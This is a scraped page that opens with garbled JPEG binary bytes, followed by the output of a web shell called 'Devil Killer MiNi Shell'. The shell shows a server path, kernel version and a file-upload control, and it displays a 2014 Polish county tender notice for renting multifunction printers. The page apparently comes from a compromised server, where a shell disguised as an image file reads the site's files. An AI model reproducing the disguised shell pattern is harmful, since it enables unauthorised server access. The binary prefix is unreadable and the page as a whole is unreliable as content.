JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140813/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140813/175085-N-2014.html

<p class="kh_header"><b>Gniezno: Wynajem urządzeń wielofunkcyjnych</b><br>
<b>Numer ogłoszenia: 175085 - 2014; data zamieszczenia: 13.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Gnieźnieński , ul. Jana Pawła II 9/10, 62-200 Gniezno, woj. wielkopolskie, tel. 061 4240706, faks 061 4240770.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.powiat-gniezno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wynajem urządzeń wielofunkcyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wynajem urządzeń wielofunkcyjnych
I. Urządzenia najmowane
1.	Dostarczone urządzenia wielofunkcyjne powinny być fabrycznie nowe, objęte gwarancją producenta.
2.	W przypadku drukarek, będących na wyposażeniu Zamawiającego (charakterystyka poniżej) dopuszcza się możliwość dostarczenia innych drukarek, o porównywalnych parametrach, w przypadku gdy z przyczyn technicznych drukarki Zamawiającego nie spełniają wymagań technicznych lub są niekompatybilne z oprogramowaniem Wykonawcy, co uniemożliwiałoby prawidłowe funkcjonowanie systemu i raportowanie. Zamawiający dopuszcza dostarczenie drukarek używanych.
3.	Wyjątek stanowi urządzenie Xerox Workcentre M128, które z przyczyn technicznych nie ma możliwości podłączenia do sieci Zamawiającego i tym samym nie będzie obsługiwane w aplikacji raportującej. Miesięczne raporty z urządzenia będą dostarczane przez Zamawiającego, aby Wykonawca mógł je uwzględnić w wystawianych fakturach. Alternatywnie Zamawiający dopuszcza dostarczenie urządzenia o zbliżonych parametrach technicznych przez Wykonawcę, aby pełniło określoną funkcję.
4.	Urządzenia powinny być dostarczone wraz z aplikacją monitorująco-raportującą. Parametry urządzeń określone poniżej przez Zamawiającego należy traktować jako wartości minimalne.
A. Specyfikacja techniczna urządzeń:
1.	Funkcjonalność drukowania
1.	Wydruk podążający i bezpieczny dostęp do urządzenia po autoryzacji 
z wykorzystaniem karty zbliżeniowej, każde zadanie musi być możliwe do edycji w zakresie ustawienia wydruku dwustronnego, ustawienia ilości drukowanych kompletów, sortowania, zmiana wydruku kolorowego na czarno-biały.
2.	Przedmiot zamówienia obejmuje również dostarczenie i konfigurację kart zbliżeniowych do autoryzacji dla 141 pracowników.
3.	każde zadanie drukowania  musi być możliwe do edycji w zakresie ustawienia wydruku dwustronnego, zmiany wydruku dwustronnego na jednostronne, ustawienie ilości stron do wydruku, dla urządzeń kolorowych konwersja wydruku kolorowego na monochromatyczny,
4.	drukarka musi obsługiwać buforowanie zadań (przyjmowanie zadań i kolejkowanie przez urządzenie) i możliwość usuwania buforowanych zadań,
5.	każdy użytkownik może wydrukować wszystkie oczekujące zadania oraz drukować wybrane dokumenty, jak również usuwać dokumenty oczekujące na wydruk na wybranym przez siebie urządzeniu,
6.	Dysk musi być szyfrowany co najmniej 256 bitowym kluczem oraz posiadać możliwość nadpisywania danych z poziomu urządzenia.
2.	Urządzenie wielofunkcyjne A4 monochromatyczne - ilość szt. 6
1.	Urządzenie wielofunkcyjne - kopiarka, drukarka, skaner + fax na dwóch urządzeniach
1.	Właściwości modułu kopiarki
1.	Prędkość kopiowania min. 30 stron na min.
2.	Format papieru A4
3.	Dupleks automatyczny
4.	Automatyczny dwustronny podajnik oryginałów na min. 50 arkuszy
5.	Kasety na papier min. 1 kaseta o pojemności min. 250 arkuszy oraz podajnik ręczny na 80 arkuszy
6.	Kopiowanie wielokrotne min. 1-99 kopii
7.	Rozdzielczość kopiowania 600 dpi
8.	Szafka stolik pod urządzenie
9.	Wyświetlacz dotykowy, kolorowy, menu w języku polskim
10.	Czytnik kart zbliżeniowych wbudowany w urządzenie
2.	Właściwości modułu drukowania
1.	Prędkość druku min. 30 stron na min.
2.	Automatyczne drukowanie dwustronne
3.	Pamięć min. 512 GB RAM / dysk twardy min. 100 GB
4.	Obsługa systemów Windows XP/Vista/7/8/2003/2008/2012 w wersjach 32 i 64 bitowych
5.	Język drukowania PCL5e, PCL6, Postscript 3
6.	Interfejsy Ethernet 10/100 Base-TX, USB
7.	Protokół sieciowy TCP/IP
8.	Rozdzielczość 600 dpi
9.	Zarządzanie przez WWW
3.	Właściwości modułu skanowania
1.	Prędkość skanowania min. 30 stron / min A4 mono / kolor
2.	Rozdzielczość skanowania 600 dpi
3.	Rozmiar oryginału A4
4.	Format pliku skanowanego JPEG, TIFF, PDF
5.	Skanowanie do folderu protokół FTP, SMB
6.	Skanowanie do mail protokół SMTP
7.	Skanowanie do nośnika USB
4.	Właściwości modułu faksowania
1.	Rozdzielczość min. 300 dpi
2.	Odbiór do folderu SMB
3.	Odbiór do e-mail SMTP
3.	Urządzenie wielofunkcyjne A3 monochromatyczne - ilość szt. 4
1.	Urządzenie wielofunkcyjne - kopiarka, skaner, drukarka
1.	Właściwości modułu kopiarki
1.	Prędkość kopiowania min. 25 stron / min.
2.	Format papieru A3
3.	Dupleks automatyczny
4.	Automatyczny dwustronny podajnik oryginałów na min. 100 arkuszy
5.	Kasety na papier min. 2 kasety po min. 250 arkuszy oraz podajnik ręczny na min. 80 arkuszy
6.	Kopiowanie wielokrotne 1-99 kopii
7.	Rozdzielczość kopiowania 600 dpi
8.	Szafka stolik pod urządzenie
9.	Wyświetlacz dotykowy, kolorowy, menu w języku polskim
10.	Czytnik kart zbliżeniowych wbudowany w urządzenie
2.	Właściwości modułu drukowania
1.	Prędkość druku min. 25 stron / min.
2.	Automatyczne drukowanie dwustronne
3.	Pamięć min. 1 GB RAM / dysk twardy min. 160 GB HDD
4.	Obsługa systemów Windows XP/Vista/7/8/2003/2008/2012 w wersjach 32 i 64 bitowych
5.	Język drukowania PCL5e, PCL6, Postscript 3
6.	Interfejsy Ethernet 10/100 Base-TX, USB
7.	Protokół sieciowy TCP/IP
8.	Rozdzielczość 600 dpi
9.	Zarządzanie przez WWW
3.	Właściwości modułu skanowania
1.	Prędkość skanowania min. 43 strony / min. tryb kolorowy i czarno-biały
2.	Rozdzielczość skanowania min. 600 dpi
3.	Rozmiar oryginału A3
4.	Format pliku skanowanego JPEG, TIFF, PDF
5.	Skanowanie do folderu protokół FTP, SMB
6.	Skanowanie do mail protokół SMTP
7.	Skanowanie do pamięci USB
4.	Urządzenie wielofunkcyjne A3 kolorowe - ilość szt. 3
1.	Urządzenie wielofunkcyjne - kopiarka, drukarka, skaner
1.	Właściwości modułu kopiarki
1.	Prędkość kopiowania min. 20 stron / min czarno-białych i kolorowych
2.	Format papieru A3
3.	Dupleks automatyczny
4.	Automatyczny dwustronny podajnik oryginałów na min. 100 arkuszy
5.	Kasety na papier min. 2 kasety o łącznej pojemności min. 1200 arkuszy (wraz z podajnikiem ręcznym)
6.	Kopiowanie wielokrotne min. 1-99 kopii
7.	Rozdzielczość kopiowania 600 dpi
8.	Szafka, stolik pod urządzenie
9.	Wyświetlacz dotykowy, kolorowy, menu w języku polskim
10.	Czytnik kart zbliżeniowych wbudowany w urządzenie
2.	Właściwości modułu drukowania
1.	Prędkość druku min. 20 stron / min czarno-białych i kolorowych
2.	Automatyczne drukowanie dwustronne
3.	Pamięć urządzenia min. 1,5 GB RAM / dysk twardy min. 160 GB
4.	Obsługa systemów Windows XP/Vista/7/8/2003/2008/2012 w wersjach 32 i 64 bitowych
5.	Język drukowania PCL5e, PCL6, Postscript 3
6.	Interfejsy Ethernet 10/100 Base-TX, USB
7.	Protokół sieciowy TCP/IP
8.	Rozdzielczość 600 dpi
9.	Zarządzanie przez WWW 
3.	Właściwości modułu skanowania
1.	Prędkość skanowania min. 50 stron / min. tryb kolorowy i czarno-biały
2.	Rozdzielczość skanowania 600 dpi
3.	Rozmiar oryginału A3
4.	Format pliku skanowanego JPEG, TIFF, PDF
5.	Skanowanie do folderu protokół FTP, SMB
6.	Skanowanie do mail protokół SMTP
7.	Skanowanie do nośnika USB
B. Specyfikacja oprogramowania monitorująco - raportującego
Aplikacją monitorująco-raportująca dostarczana wraz z urządzeniami powinna posiadać następujące właściwości i funkcjonalności:
1.	Aplikacja musi pracować w środowisku Windows, w zakresie wersji systemów operacyjnych: XP, 2000/2003 serwer, Vista, 2008 serwer, 2012 serwer, Windows 7, Windows 8.
2.	Aplikacja musi posiadać własny silnik bazodanowy do przechowywania listy użytkowników, struktur organizacyjnych, listy urządzeń i pobieranych danych z urządzeń drukujących.
3.	Aplikacja oferować możliwość zarządzania flotą urządzeń centralnie poprzez klienta opartego o przeglądarkę internetową.
4.	Aplikacja musi zapewniać zarówno ręczny jak i automatyczny odczyt liczników użytkowników z urządzeń z możliwością dowolnego określenia godziny odczytu.
5.	Aplikacja nie może wymagać ciągłego połączenia sieciowego z urządzeniami w celu odczytu liczników. Odczyty liczników mają być dokonywane raz na dobę, a w przypadku awarii sieci teleinformatycznej, historia użycia urządzeń przez użytkowników ma być przechowywana w ich pamięci do momentu przywrócenia połączenia sieciowego z jednostką serwera z zainstalowaną aplikacją. W takim przypadku odczyt liczników użytkowników powinien odbyć się automatycznie, zgodnie z ustalonym harmonogramem godzin odczytu bez jakiejkolwiek ingerencji administratora/użytkownika.
6.	Moduł raportowy aplikacji musi zapewniać możliwość eksportu generowanych raportów przynajmniej do plików *.csv, *.xlsx, i *.html
7.	Aplikacja musi posiadać własny moduł raportowy z predefiniowanymi typami raportów zapewniającymi możliwość dowolnego określania dat granicznych raportu z dokładności do jednego dnia. Minimalne wymagane typy raportów są następujące:
1.	 raport kosztów i ilości wydrukowanych stron na użytkownika z podziałem na mono i kolor
2.	raport kosztów i ilości wydrukowanych na urządzenie z podziałem na mono i
kolor 
3.	raport kosztów i ilości wydrukowanych na MPK czyli miejsce powstawania kosztu (dział, projekt itp.) z podziałem na mono i kolor
4.	raport kosztów i ilości wydrukowanych na wydział z podziałem na mono i kolor o raport kosztów i stanu liczników całkowitych/totalnych dla poszczególnych urządzeń.
8.	Aplikacja musi posiadać wszystkie występujące w niej interfejsy w języku polskim.
9.	Zliczanie ilości wykonanych prac użytkowników nie może odbywać się poprzez monitoring kolejek drukowania na serwerze druku i stacjach roboczych.
10.	Niedopuszczalna jest instalacja jakichkolwiek części systemu rozliczającego na stacjach roboczych z wyjątkiem oprogramowania niezbędnego do raportowania danych z drukarek biurkowych. Część serwera rozwiązania musi być zainstalowana na serwerze Zamawiającego lub alternatywnie na urządzeniu dostarczonym wraz z oprogramowaniem przez Wykonawcę.
11.	Aplikacja musi zapewnić maksymalną (blisko 100%) dokładność faktycznie wydrukowanych stron przez użytkowników i nie może dopuszczać zliczania stron faktycznie niewydrukowanych, np. w przypadku anulowania wydruku w dowolnym momencie zliczone będą tylko strony faktycznie wydrukowane.
12.	Do urządzeń należy przekazać licencję na aplikację zapewniającą możliwość podłączenia wszystkich urządzeń będących przedmiotem zamówienia. Licencja nie może być ograniczona czasowo.
Zamawiający na etapie wyboru oferty ma prawo weryfikacji funkcji systemu poprzez testy.
II. Urządzenia będące na wyposażeniu Zamawiającego objęte serwisem pogwarancyjnym
Model	Data przyjęcia
Hp Laser Jet P1606dn	20.10.2010
Hp Laser Jet P1606dn	20.10.2010
Hp Laser Jet P1606dn	23.10.2012
Hp Laser Jet P1606dn	23.12.2012
Hp Laser Jet P1606dn	22.02.2013
Hp Laser Jet P2055d	11.04.2012
Xerox Workcentre M128	31.12.2007
UWAGA! Zamawiający dopuszcza możliwość dostarczenia innych drukarek,
o porównywalnych parametrach, w przypadku gdy z przyczyn technicznych drukarki Zamawiającego nie spełniają wymagań technicznych lub są niekompatybilne
z oprogramowaniem Wykonawcy, co uniemożliwiałoby prawidłowe funkcjonowanie 
i raportowanie.
III. Urządzenia będące na wyposażeniu Zamawiającego nie objęte serwisem pogwarancyjnym (będące własnością Państwowej Wytwórni Papierów Wartościowych).
Model	Data przyjęcia
OKI B430	2.09.2010
OKI B431	2.09.2010
Lexmark E120	31.10.2007
Lexmark E120n	2.09.2010

UWAGA! Zamawiający informuje, że w czasie obowiązywania umowy drukarki mogą zastąpione innymi, nowszymi urządzeniami. W takim przypadku dostawy materiałów eksploatacyjnych do urządzeń powinny być kontynuowane w uwzględnieniem parametrów technicznych nowych urządzeń.
IV. Wymagania dotyczące obsługi serwisowej, dostarczania materiałów eksploatacyjnych, części zamiennych, szkoleń, gwarancji itp.
Oferent zobowiązany jest do:
1.	wykonywania obsługi serwisowej urządzeń będących przedmiotem umowy w sposób rzetelny, terminowy i zapewniający sprawne jego działanie,
2.	podejmowania wynikających z obsługi serwisowej działań polegających na przeprowadzeniu ekspertyzy technicznej w siedzibie Zamawiającego, w terminie 8 godzin od odebrania od Zamawiającego pisemnego (lub telefonicznego w godz. od 7.30 do 15.30) zgłoszenia o konieczności dokonania konserwacji lub naprawy sprzętu oraz zakończenia ich w terminie 24 godzin od momentu rozpoczęcia naprawy,
3.	bezpłatnego dostarczenia wszelkich części zamiennych niezbędnych do naprawy oraz materiałów eksploatacyjnych niezbędnych do prawidłowego działania urządzeń w terminie 8 godzin od momentu zgłoszenia zapotrzebowania,
4.	nieodpłatnego użyczenia Zamawiającemu na cały czas trwania naprawy urządzenia zastępczego o tych samych lub nie gorszych parametrach, w przypadku gdy naprawa objętego umową urządzenia nie może zostać wykonana w terminie 16 godzin od momentu zgłoszenia awarii (urządzenie zastępcze musi zostać podłączone do sieci teleinformatycznej i skonfigurowane do bieżącej pracy przez Oferenta),
5.	bezpłatnego, w okresie trwania umowy:
1.	przeszkolenia personelu Zamawiającego obsługującego urządzenia w dowolnym, wyznaczonym przez Zamawiającego terminie (zakres szkolenia i liczba godzin przeznaczona na szkolenie jest określana przez Zamawiającego, bez żadnych dodatkowych limitów),
2.	zapewnienia wsparcia w zakresie funkcjonowania urządzeń w środowisku informatycznym,
3.	ustawienia parametrów wydruku w środowisku informatycznym klienta,
4.	instalacji wymaganego przez sprzęt oprogramowania, w celu zapewnienia wykorzystania wszystkich funkcji najmowanych urządzeń,
5.	konfiguracji dostępu do urządzeń, wraz z przypisaniem praw dostępu,
6.	rozliczania ilości wykonanych stron przez poszczególnych pracowników,
7.	dokonania naprawy sprzętu we własnym lokalu serwisowym, o ile jest to uzasadnione rodzajem uszkodzenia, po uprzednim dostarczeniu sprzętu zastępczego,
6.	zapewnienia gwarancji najmowanych urządzeń wielofunkcyjnych w trakcie trwania umowy,
7.	zapewnienia serwisu pogwarancyjnego dla urządzeń wyszczególnionych w pkt. II.
8.	zapewnienia ubezpieczenia najmowanych urządzeń w trakcie trwania umowy.
V. Dostarczenie urządzeń objętych przedmiotem zamówienia oraz ich konfiguracja 
w siedzibie Zamawiającego musi nastąpić w terminie 14 dni kalendarzowych od dnia zawarcia umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.12.14.30-6, 30.23.21.10-8, 30.12.51.10-5, 50.31.20.00-5, 30.12.43.00-7, 50.31.20.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca złoży dokument - oświadczenie potwierdzające spełnianie przedmiotowego warunku.
Ocena spełniania w/w warunku będzie dokonywana metodą: spełnia/nie spełnia 
w oparciu o złożony/e dokument/y.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie realizacji przynajmniej trzy dostawy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
o treści podobnej z przedmiotem niniejszego zamówienia o wartości nie mniejszej niż 100 000,00 PLN brutto każda z podaniem rodzaju i zakresu zamówienia, dat wykonania, adresu zamawiającego, wartości brutto zamówienia oraz załączeniem dokumentów potwierdzających, że dostawy zostały wykonane należycie.
Zamawiający przez dostawę podobną z przedmiotem zamówienia rozumie dostawy z minimum trzech zrealizowanych umów na najem wraz z usługami serwisowymi lub na dostawę urządzeń wielofunkcyjnych w kwocie nie mniejszej niż 100.000,00 zł brutto na każda z nich.
Do Wykazu należy dołączyć dowody, czy dostawy zostały wykonane lub są wykonywane należycie.
Dowodami, o których mowa w niniejszym punkcie, są:
1) poświadczenie, z tym że w odniesieniu do nadal wykonywanych dostaw lub usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert lub
2) oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać dokumentu, o których mowa w ppkt 1).
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane 
w wykazie, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.
Zamawiający dopuszcza również przedłożenie dokumentów potwierdzających należyte wykonanie lub wykonywanie usług np. referencje.
Ocena spełniania w/w warunku będzie dokonywana metodą: spełnia/nie spełnia 
w oparciu o złożony/e dokument/y.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Wykonawca winien złożyć dokument - oświadczenie potwierdzające spełnianie przedmiotowego warunku.
Ocena spełniania w/w warunku będzie dokonywana metodą: spełnia/nie spełnia 
w oparciu o złożony/e dokument/y.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Wykonawca winien złożyć dokument - oświadczenie potwierdzające spełnianie przedmiotowego warunku.
Ocena spełniania w/w warunku będzie dokonywana metodą: spełnia/nie spełnia 
w oparciu o złożony/e dokument/y.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
